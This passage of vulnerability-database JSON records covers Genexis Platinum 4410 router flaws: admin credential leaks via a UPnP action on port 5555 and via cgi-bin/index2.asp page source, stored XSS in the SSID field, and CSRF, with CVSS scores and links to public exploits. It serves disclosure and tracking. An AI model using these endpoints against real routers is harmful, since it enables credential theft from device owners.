"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2020-09-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-09T17:26:50",
"db": "PACKETSTORM",
"id": "159936"
},
{
"date": "2020-09-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2020-09-16T18:15:13.390000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2022-11-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T06:57:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2024-11-21T05:16:31.130000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum cross-site request forgery vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
}
}
VAR-202011-0712
Vulnerability from variot - Updated: 2024-11-23 23:04UPNP Service listening on port 5555 in Genexis Platinum 4410 Router V2.1 (P4410-V2–1.34H) has an action 'X_GetAccess' which leaks the credentials of 'admin', provided that the attacker is network adjacent. Genexis Platinum 4410 Router Contains a vulnerability in the transmission of important information in clear text.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202011-0712",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.34h"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2.1 (p4410-v2-1.34h)"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nitesh Surana",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
],
"trust": 0.6
},
"cve": "CVE-2020-25988",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2020-25988",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-25988",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-25988",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-25988",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-25988",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202011-1539",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPNP Service listening on port 5555 in Genexis Platinum 4410 Router V2.1 (P4410-V2\u20131.34H) has an action \u0027X_GetAccess\u0027 which leaks the credentials of \u0027admin\u0027, provided that the attacker is network adjacent. Genexis Platinum 4410 Router Contains a vulnerability in the transmission of important information in clear text.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25988"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25988",
"trust": 2.4
},
{
"db": "EXPLOIT-DB",
"id": "49075",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-013954",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"id": "VAR-202011-0712",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.44642857
},
"last_update_date": "2024-11-23T23:04:13.414000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-319",
"trust": 1.0
},
{
"problemtype": "Sending important information in clear text (CWE-319) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://www.exploit-db.com/exploits/49075"
},
{
"trust": 1.6,
"url": "https://github.com/ideaengine007/randomstuffs/blob/main/version_vulnerable.png"
},
{
"trust": 1.6,
"url": "https://youtu.be/gomlavacqsi"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25988"
},
{
"trust": 1.0,
"url": "https://medium.com/%40niteshsurana/424f0db73129"
},
{
"trust": 0.8,
"url": "https://github.com/n1teshsurana/randomstuffs/blob/main/version_vulnerable.png"
},
{
"trust": 0.6,
"url": "https://medium.com/@niteshsurana/424f0db73129"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
},
{
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"date": "2020-11-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202011-1539"
},
{
"date": "2020-11-17T20:15:11.160000",
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-16T06:13:00",
"db": "JVNDB",
"id": "JVNDB-2020-013954"
},
{
"date": "2020-12-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202011-1539"
},
{
"date": "2024-11-21T05:19:02.300000",
"db": "NVD",
"id": "CVE-2020-25988"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis\u00a0Platinum\u00a04410\u00a0Router\u00a0 Vulnerability in plaintext transmission of important information in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-013954"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202011-1539"
}
],
"trust": 0.6
}
}
VAR-202001-1817
Vulnerability from variot - Updated: 2024-11-23 23:01An authentication bypass vulnerability on Genexis Platinum-4410 v2.1 P4410-V2 1.28 devices allows attackers to obtain cleartext credentials from the HTML source code of the cgi-bin/index2.asp URI. Genexis Platinum-4410 The device contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Genexis Platinum-4410 is a WiFi 300/750 Mbps three-network integrated GPON ONT series router.
Genexis Platinum-4410 2.1 P4410-V2 1.28 has an authentication bypass vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1817",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum-4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "2 1.28"
},
{
"model": "platinum-4410 p4410-v2",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "2.11.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:genexis:platinum-4410_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Husinul Sanub",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
],
"trust": 0.6
},
"cve": "CVE-2020-6170",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-6170",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-14704",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-6170",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-6170",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-6170",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2020-6170",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-14704",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-245",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An authentication bypass vulnerability on Genexis Platinum-4410 v2.1 P4410-V2 1.28 devices allows attackers to obtain cleartext credentials from the HTML source code of the cgi-bin/index2.asp URI. Genexis Platinum-4410 The device contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Genexis Platinum-4410 is a WiFi 300/750 Mbps three-network integrated GPON ONT series router. \n\r\n\r\nGenexis Platinum-4410 2.1 P4410-V2 1.28 has an authentication bypass vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6170"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "CNVD",
"id": "CNVD-2020-14704"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6170",
"trust": 3.0
},
{
"db": "PACKETSTORM",
"id": "156075",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-14704",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "47961",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"id": "VAR-202001-1817",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
}
]
},
"last_update_date": "2024-11-23T23:01:32.253000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://genexis.co.in/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.0
},
{
"problemtype": "CWE-306",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/156075/genexis-platinum-4410-2.1-authentication-bypass.html"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6170"
},
{
"trust": 1.0,
"url": "https://medium.com/%40husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6170"
},
{
"trust": 0.6,
"url": "https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/47961"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"date": "2020-01-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-245"
},
{
"date": "2020-01-08T06:15:12.383000",
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"date": "2022-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-245"
},
{
"date": "2024-11-21T05:35:14.213000",
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-245"
}
],
"trust": 0.6
}
}
VAR-202010-1001
Vulnerability from variot - Updated: 2024-11-23 22:25Genexis Platinum-4410 P4410-V2-1.28 devices allow stored XSS in the WLAN SSID parameter. This could allow an attacker to perform malicious actions in which the XSS popup will affect all privileged users. Genexis Platinum-4410 Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Genexis Platinum-4410 is a wireless router of British Genexis company.
Genexis Platinum-4410 P4410-V2-1.28 has a cross-site scripting vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
